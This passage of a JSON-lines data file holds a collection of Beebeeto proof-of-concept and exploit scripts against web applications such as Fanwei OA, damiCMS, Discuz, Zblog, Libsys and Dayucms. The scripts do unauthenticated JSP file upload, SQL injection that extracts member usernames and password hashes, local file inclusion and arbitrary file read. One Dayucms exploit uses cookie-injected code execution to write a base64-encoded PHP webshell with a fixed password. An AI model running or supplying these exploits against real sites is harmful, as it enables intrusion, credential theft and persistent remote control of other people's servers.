'tag': ['\u6cdb\u5faeoa\u6f0f\u6d1e', '/tools/SWFUpload/upload.jsp', 'File Upload', 'jsp'],\r\n            'desc': '''\r\n                    http://xxx.xxx.xxx.xxx/tools/SWFUpload/upload.jsp\r\n                    post:\r\n                        type=\"file\" name=\"test\"\r\n                    \u53ef\u4ee5\u65e0\u9700\u767b\u5f55\u76f4\u63a5\u4e0a\u4f20\u4efb\u610f\u6587\u4ef6\u3002\r\n                    ''',\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2014-076547'],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        target_url = args['options']['target'] + \"/tools/SWFUpload/upload.jsp\"\r\n        verify_url = args['options']['target'] + \"/nulltest.jsp\"\r\n        files = {'test':('test.jsp', r\"\"\"<%@ page import=\"java.util.*,java.io.*\" %>\r\n        <%@ page import=\"java.io.*\"%>\r\n        <%\r\n        String path=application.getRealPath(request.getRequestURI());\r\n        File d=new File(path);\r\n        out.println(path);\r\n        %>\r\n        <% out.println(\"payload=true\");%>\"\"\")}\r\n\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + target_url\r\n\r\n        req = requests.get(target_url,files=files)\r\n        verify_req = requests.get(verify_url)\r\n        content = verify_req.content\r\n\r\n        if verify_req.status_code == 200 and 'payload=true' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "http://xxx.xxx.xxx.xxx/tools/SWFUpload/upload.jsp\r\npost:\r\n    type=\"file\" name=\"test\"\r\n\u53ef\u4ee5\u65e0\u9700\u767b\u5f55\u76f4\u63a5\u4e0a\u4f20\u4efb\u610f\u6587\u4ef6\u3002", "app_name": "Other", "id": "poc-2015-0117", "layer4_protocol": null}
+{"create_date": "2015-06-28 17:01:51", "name": "\u5927\u7c73CMS /Web/Lib/Action/ApiAction.class.php SQL\u6ce8\u5165\u6f0f\u6d1e POC & Exploit", "level": "\u4e2d\u5371", "batchable": 1, "author": "xyw55", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "damiCMS\u6f0f\u6d1e,ApiAction.class.php\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0116',\r\n            'name': '\u5927\u7c73CMS /Web/Lib/Action/ApiAction.class.php SQL\u6ce8\u5165\u6f0f\u6d1e POC & Exploit',\r\n            'author': 'xyw55',\r\n            'create_date': '2015-06-28',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'damiCMS',\r\n            'vul_version': ['*'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['damiCMS\u6f0f\u6d1e', 'ApiAction.class.php\u6f0f\u6d1e', 'php'],\r\n            'desc': '''\r\n                    damiCMS SQL\u6ce8\u5165\u6f0f\u6d1e\uff0c\u6f0f\u6d1e\u4f4d\u4e8e/Web/Lib/Action/ApiAction.class.php\uff0c\r\n                    \u8fc7\u6ee4\u4e0d\u4e25\u5bfc\u81f4\u6f0f\u6d1e\u3002\r\n                    ''',\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2010-097671'],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        url = args['options']['target']\r\n        payload = '''s=/api/ajax_arclist/model/article/field/md5(1)%23'''\r\n        verify_url = ('%s/index.php?%s') % (url, payload)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        req = requests.get(verify_url)\r\n        if req.status_code == 200 and 'ca4238a0b923820dcc509a6f75849' in req.content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n\r\n    @classmethod\r\n    def exploit(cls, args):\r\n        url = args['options']['target']\r\n        payload = '''s=/api/ajax_arclist/model/article/field/username,userpwd%20from%20dami_member%23'''\r\n        verify_url = ('%s/index.php?%s') % (url, payload)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        req = requests.get(verify_url)\r\n        if req.status_code == 200:\r\n            pattern = r'username\":\"(.*?)\",\"userpwd\":\"(.{32})\"}'\r\n            m = re.findall(pattern, req.content)\r\n            if m:\r\n                args['success'] = True\r\n                args['poc_ret']['user'] = []\r\n                for x in m:\r\n                    args['poc_ret']['user'].append(x)\r\n        return args\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "damiCMS SQL\u6ce8\u5165\u6f0f\u6d1e\uff0c\u6f0f\u6d1e\u4f4d\u4e8e/Web/Lib/Action/ApiAction.class.php\uff0c\u8fc7\u6ee4\u4e0d\u4e25\u5bfc\u81f4\u6f0f\u6d1e\u3002", "app_name": "\u5927\u7c73CMS", "id": "poc-2015-0116", "layer4_protocol": null}
+{"create_date": "2015-06-25 21:11:56", "name": "Discuz X3.0 full Path Disclosure Vulnerability POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "JustForeg", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Discuz\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e,Information Disclosure,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0114',\r\n            'name': 'Discuz X3.0 full Path Disclosure Vulnerability POC',\r\n            'author': 'JustForeg',\r\n            'create_date': '2015-06-25',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Discuz',\r\n            'vul_version': ['X3.0'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['Discuz\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e', 'Information Disclosure', 'php'],\r\n            'desc': 'discuz X3.0 \u5b58\u5728\u591a\u5904\u7edd\u5bf9\u8def\u5f84\u6cc4\u9732',\r\n            'references': ['N/A', ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payloads = [\r\n            '/api/addons/zendcheck.php',\r\n            '/api/addons/zendcheck52.php',\r\n            '/api/addons/zendcheck53.php',\r\n            '/source/plugin/mobile/api/1/index.php',\r\n            '/source/plugin/mobile/extends/module/dz_digest.php',\r\n            '/source/plugin/mobile/extends/module/dz_newpic.php',\r\n            '/source/plugin/mobile/extends/module/dz_newreply.php',\r\n            '/source/plugin/mobile/extends/module/dz_newthread.php',\r\n        ]\r\n        args['poc_ret']['file_path'] = []\r\n        pathinfo = re.compile(r' in <b>(.*)</b> on line')\r\n        for payload in payloads:\r\n            verify_url = args['options']['target'] + payload\r\n            if args['options']['verbose']:\r\n                print '[*] Request URL: ' + verify_url\r\n                print '[*] GET: ' + payload\r\n            req = requests.get(verify_url)\r\n            match = pathinfo.findall(req.content)\r\n            if match:\r\n                args['success'] = True\r\n                args['poc_ret']['file_path'].append(match[0])\r\n        if not args['poc_ret']['file_path']:\r\n            args['poc_ret'].pop('file_path')\r\n        return args\r\n\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "discuz X3.0 \u5b58\u5728\u591a\u5904\u7edd\u5bf9\u8def\u5f84\u6cc4\u9732", "app_name": "Discuz", "id": "poc-2015-0114", "layer4_protocol": null}
+{"create_date": "2015-06-25 11:01:12", "name": "Discuz X2.5 /uc_server/control/admin/db.php \u8def\u5f84\u6cc4\u9732\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "pikachu", "rank": 1, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Discuz\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e,Information Disclosure,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0113',\r\n            'name': 'Discuz X2.5 /uc_server/control/admin/db.php \u8def\u5f84\u6cc4\u9732\u6f0f\u6d1e POC',\r\n            'author': 'pikachu',\r\n            'create_date': '2015-06-23',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Discuz',\r\n            'vul_version': ['X2.5'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['Discuz\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e', 'Information Disclosure', 'php'],\r\n            'desc': 'discuz X2.5 \u5b58\u5728\u591a\u5904\u7edd\u5bf9\u8def\u5f84\u6cc4\u9732\u3002',\r\n            'references': ['N/A',\r\n            ],\r\n        },\r\n    }\r\n    \r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = r'/uc_server/control/admin/db.php'\r\n        verify_url = args['options']['target'] + payload\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n            print '[*] GET: ' + payload\r\n        req = requests.get(verify_url)\r\n        pathinfo = re.compile(r'not found in <b>(.*)</b> on line')\r\n        match = pathinfo.findall(req.content)\r\n        if match:\r\n            path = match[0]\r\n            args['success'] = True\r\n            args['poc_ret']['path'] = path\r\n        return args\r\n        \r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "discuz X2.5 \u5b58\u5728\u591a\u5904\u7edd\u5bf9\u8def\u5f84\u6cc4\u9732\u3002", "app_name": "Discuz", "id": "poc-2015-0113", "layer4_protocol": null}
+{"create_date": "2015-06-21 20:38:39", "name": "Git information disclosure POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "t0nyhj", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "information disclosure,git\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e,git", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0112',\r\n            'name': 'Git information disclosure POC',\r\n            'author': 't0nyhj',\r\n            'create_date': '2015-06-18',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'N/A',\r\n            'vul_version': ['*'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['information disclosure', 'git\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e', 'git'],\r\n            'desc': 'use git incorrect cause site information disclosure',\r\n            'exploit':'https://github.com/lijiejie/GitHack',\r\n            'references': ['http://wooyun.org/bugs/wooyun-2010-0100762',\r\n                           'http://www.beebeeto.com/pdb/poc-2014-0024/',\r\n            ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        keyword = ['core','remote','branch']\r\n        vul_url = args[\"options\"][\"target\"] + '/.git/config'\r\n        if args['options']['verbose']:\r\n            print \"[*] Request URL:\", vul_url\r\n        resquest = urllib2.Request(vul_url)\r\n        response = urllib2.urlopen(resquest)\r\n        if response.getcode() != 200:\r\n            args[\"success\"] = False\r\n            return args\r\n        content = response.read()\r\n        flag = False\r\n        for word in keyword:\r\n            if word in content:\r\n                flag = True\r\n                break\r\n        if flag == True:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = vul_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "use git incorrect cause site information disclosure", "app_name": "Other", "id": "poc-2015-0112", "layer4_protocol": null}
+{"create_date": "2015-06-17 14:25:20", "name": "Zblog /zb_install/index.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "user1018", "rank": 4, "port": null, "vul_type": "\u672c\u5730\u6587\u4ef6\u5305\u542b", "tag": "Zblog\u6700\u65b0\u7248\u672c\u6f0f\u6d1e,Zblog \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0111',\r\n            'name': 'Zblog /zb_install/index.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC',\r\n            'author': 'user1018',\r\n            'create_date': '2015-06-17',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Zblog',\r\n            'vul_version': ['*'],\r\n            'type': 'Local File Inclusion',\r\n            'tag': ['Zblog\u6700\u65b0\u7248\u672c\u6f0f\u6d1e', 'Zblog \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e', 'php'],\r\n            'desc': '''\r\n                    \u867d\u7136\u9650\u5236\u4e86\u5fc5\u987b\u4e3a.php\u540e\u7f00\u7684\uff0c\u4f46\u662f\u56e0\u4e3a\u6ca1\u5bf9POST\u8f6c\u4e49\uff0c\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u622a\u65ad\u540e\u9762\u7684.php\u3002\r\n                    ''',\r\n            'references': ['http://0day5.com/archives/3213',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        filepath = '/zb_install/index.php'\r\n        payload = 'zbloglang=../../zb_system/image/admin/none.gif%00'\r\n        verify_url = args['options']['target'] + filepath\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n            print '[*] POST: ' + payload\r\n        req = requests.post(verify_url, data=payload)\r\n        if 'Cannot use a scalar value' in req.content and req.status_code == 500:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u867d\u7136\u9650\u5236\u4e86\u5fc5\u987b\u4e3a.php\u540e\u7f00\u7684\uff0c\u4f46\u662f\u56e0\u4e3a\u6ca1\u5bf9POST\u8f6c\u4e49\uff0c\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u622a\u65ad\u540e\u9762\u7684.php\u3002", "app_name": "Z-blog", "id": "poc-2015-0111", "layer4_protocol": null}
+{"create_date": "2015-06-09 16:33:29", "name": "\u6c47\u6587Libsys\u56fe\u4e66\u9986\u7ba1\u7406\u7cfb\u7edf /zplug/ajax_asyn_link.old.php \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "ko0zhi", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "Libsys\u6f0f\u6d1e,/zplug/ajax_asyn_link.old.php\u6f0f\u6d1e,php,\u56fe\u4e66\u9986\u7ba1\u7406\u7cfb\u7edf", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0109',\r\n            'name': '\u6c47\u6587Libsys\u56fe\u4e66\u9986\u7ba1\u7406\u7cfb\u7edf /zplug/ajax_asyn_link.old.php \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e POC',\r\n            'author': 'ko0zhi',\r\n            'create_date': '2015-06-09',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'libsys',\r\n            'vul_version': ['*'],\r\n            'type': 'Arbitrary File Read',\r\n            'tag': ['Libsys\u6f0f\u6d1e', '/zplug/ajax_asyn_link.old.php\u6f0f\u6d1e', 'php', '\u56fe\u4e66\u9986\u7ba1\u7406\u7cfb\u7edf'],\r\n            'desc': '''\r\n                    \u6c47\u6587\u8f6f\u4ef6Libsys\u56fe\u4e66\u9986\u7ba1\u7406\u7cfb\u7edf\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\uff0c\u53ef\u4ee5\u76f4\u63a5\u83b7\u53d6\u7ba1\u7406\u5458\u8d26\u53f7\uff0c\u5bc6\u7801\u660e\u6587\u3001\u6570\u636e\u5e93\u5bc6\u7801\u660e\u6587\u3001\r\n                    \u914d\u7f6e\u4fe1\u606f\u7b49\u975e\u5e38\u654f\u611f\u7684\u4fe1\u606f\uff0c\u53ef\u4ee5\u8f7b\u677e\u5b9e\u73b0\u65e0\u4efb\u4f55\u9650\u5236\u83b7\u53d6 WEBSHELL ...\r\n                    ''',\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2014-059850'],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        url = args['options']['target']\r\n        verify_url = ('%s/zplug/ajax_asyn_link.old.php?url='\r\n                      '../admin/opacadminpwd.php') % url\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        req = requests.get(verify_url)\r\n        if req.status_code == 200 and '$strPassWdView' in req.content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u6c47\u6587\u8f6f\u4ef6Libsys\u56fe\u4e66\u9986\u7ba1\u7406\u7cfb\u7edf\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\uff0c\u53ef\u4ee5\u76f4\u63a5\u83b7\u53d6\u7ba1\u7406\u5458\u8d26\u53f7\uff0c\u5bc6\u7801\u660e\u6587\u3001\u6570\u636e\u5e93\u5bc6\u7801\u660e\u6587\u3001\u914d\u7f6e\u4fe1\u606f\u7b49\u975e\u5e38\u654f\u611f\u7684\u4fe1\u606f\uff0c\u53ef\u4ee5\u8f7b\u677e\u5b9e\u73b0\u65e0\u4efb\u4f55\u9650\u5236\u83b7\u53d6 WEBSHELL ...", "app_name": "Libsys", "id": "poc-2015-0109", "layer4_protocol": null}
+{"create_date": "2015-06-09 16:27:23", "name": "Dayucms & Dircms <=1.526 /pay/order.php \u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "foundu", "rank": 5, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "Dircms\u6f0f\u6d1e,Dayucms\u6f0f\u6d1e,/pay/order.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport random\r\nimport base64\r\nimport hashlib\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0108',\r\n            'name': 'Dayucms & Dircms <=1.526 /pay/order.php \u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit',\r\n            'author': 'foundu',\r\n            'create_date': '2015-06-09',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Dayucms',\r\n            'vul_version': ['<=1.526'],\r\n            'type': 'Code Execution',\r\n            'tag': ['Dircms\u6f0f\u6d1e', 'Dayucms\u6f0f\u6d1e', '/pay/order.php', 'php'],\r\n            'desc': '''\r\n                    DayuCMS\u5728\u5c06\u5b57\u7b26\u4e32\u8f6c\u6362\u4e3a\u6570\u7ec4\u7684\u51fd\u6570\u4e2d\u76f4\u63a5\u5229\u7528eval\uff0c\u5e76\u4e14\u5b58\u5728\u53ef\u63a7\u53d8\u91cf\uff0c\u5bfc\u81f4\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002\r\n                    ''',\r\n            'references': ['http://joychou.org/index.php/web/dayucms-1-526-foreground-remote-code-execution.html',\r\n            ],\r\n        },\r\n    }\r\n\r\n    @staticmethod\r\n    def md5_t(char):\r\n        return hashlib.md5(char).hexdigest()\r\n\r\n    @classmethod\r\n    def dayucms_md5(cls, char):\r\n        return cls.md5_t(char)[8:24]\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        ip = '2.2.2.2'\r\n        filenum = random.randint(10000, 99999)\r\n        filename = base64.b64encode('%d.php' % filenum)\r\n        verify_url = '%s/pay/order.php' % args['options']['target']\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        req = requests.get(verify_url)\r\n        cookie = req.cookies\r\n        for cookie_tuple in cookie.items():\r\n            for k in cookie_tuple:\r\n                if 'siteid' in k:\r\n                    cookie_pre = k\r\n                    break\r\n        cookie_key = cls.dayucms_md5('productarray'+ip)\r\n        cookie_key = cookie_pre[:-6] + cookie_key\r\n        if args['options']['verbose']:\r\n            print '[*] XFF is: %s' % ip\r\n            print '[*] Cookie_key which need to add is: %s\\n' % cookie_key\r\n        vs = 'PD9waHAgdmFyX2R1bXAobWQ1KDEyMykpO3VubGluayhfX0ZJTEVfXyk7'\r\n        verify_shell = 'fputs(fopen(base64_decode(%s),w),base64_decode(%s))' % (filename, vs)\r\n        verify_shell = '1%3b' + verify_shell\r\n        false_headers = {'X-Forwarded-For': ip}\r\n        false_cookies = {cookie_key: verify_shell, cookie_pre: '1'}\r\n        verify_req = requests.get(verify_url, cookies = false_cookies, headers = false_headers)\r\n        verify_shell_url = '%s/pay/%d.php' % (args['options']['target'], filenum)\r\n        if '202cb962ac59075b964b07152d234b70' in requests.get(verify_shell_url).content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    @classmethod\r\n    def exploit(cls, args):\r\n        ip = '2.2.2.2'\r\n        filenum = random.randint(10000, 99999)\r\n        filename = base64.b64encode('%d.php' % filenum)\r\n        verify_url = '%s/pay/order.php' % args['options']['target']\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        req = requests.get(verify_url)\r\n        cookie = req.cookies\r\n        for cookie_tuple in cookie.items():\r\n            for k in cookie_tuple:\r\n                if 'siteid' in k:\r\n                    cookie_pre = k\r\n                    break\r\n        cookie_key = cls.dayucms_md5('productarray'+ip)\r\n        cookie_key = cookie_pre[:-6] + cookie_key\r\n        if args['options']['verbose']:\r\n            print '[*] XFF is: %s' % ip\r\n            print '[*] Cookie_key which need to add is: %s\\n' % cookie_key\r\n        vs = 'PD9waHAKdmFyX2R1bXAobWQ1KDEyMykpOwphc3NlcnQoCiRfUE9TVFtiZWViZWV0b10KKTs'\r\n        webshell = 'fputs(fopen(base64_decode(%s),w),base64_decode(%s))' % (filename, vs)\r\n        webshell = '1%3b' + webshell\r\n        false_headers = {'X-Forwarded-For': ip}\r\n        false_cookies = {cookie_key: webshell, cookie_pre: '1'}\r\n        verify_req = requests.get(verify_url, cookies = false_cookies, headers = false_headers)\r\n        shell_url = '%s/pay/%d.php' % (args['options']['target'], filenum)\r\n        if '202cb962ac59075b964b07152d234b70' in requests.get(shell_url).content:\r\n            args['success'] = True\r\n            args['poc_ret']['webshell'] = shell_url\r\n            args['poc_ret']['password'] = 'beebeeto'\r\n        return args\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "DayuCMS\u5728\u5c06\u5b57\u7b26\u4e32\u8f6c\u6362\u4e3a\u6570\u7ec4\u7684\u51fd\u6570\u4e2d\u76f4\u63a5\u5229\u7528eval\uff0c\u5e76\u4e14\u5b58\u5728\u53ef\u63a7\u53d8\u91cf\uff0c\u5bfc\u81f4\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002", "app_name": "Dayucms", "id": "poc-2015-0108", "layer4_protocol": null}
+{"create_date": "2015-06-04 21:15:44", "name": "Discuz \u95ee\u5377\u8c03\u67e5\u63d2\u4ef6 /nds_ques_viewanswer.inc.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "Discuz\u95ee\u5377\u8c03\u67e5\u4e13\u4e1a\u7248\u63d2\u4ef6\u6ce8\u5165,/nds_ques_viewanswer.inc.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0107',\r\n            'name': 'Discuz \u95ee\u5377\u8c03\u67e5\u63d2\u4ef6 /nds_ques_viewanswer.inc.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n            'author': '1024',\r\n            'create_date': '2015-06-04',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Discuz',\r\n            'vul_version': ['*'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['Discuz\u95ee\u5377\u8c03\u67e5\u4e13\u4e1a\u7248\u63d2\u4ef6\u6ce8\u5165', '/nds_ques_viewanswer.inc.php', 'php'],\r\n            'desc': 'Discuz plugin sql injection vulnerability.',\r\n            'references': ['http://0day5.com/archives/3184',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = 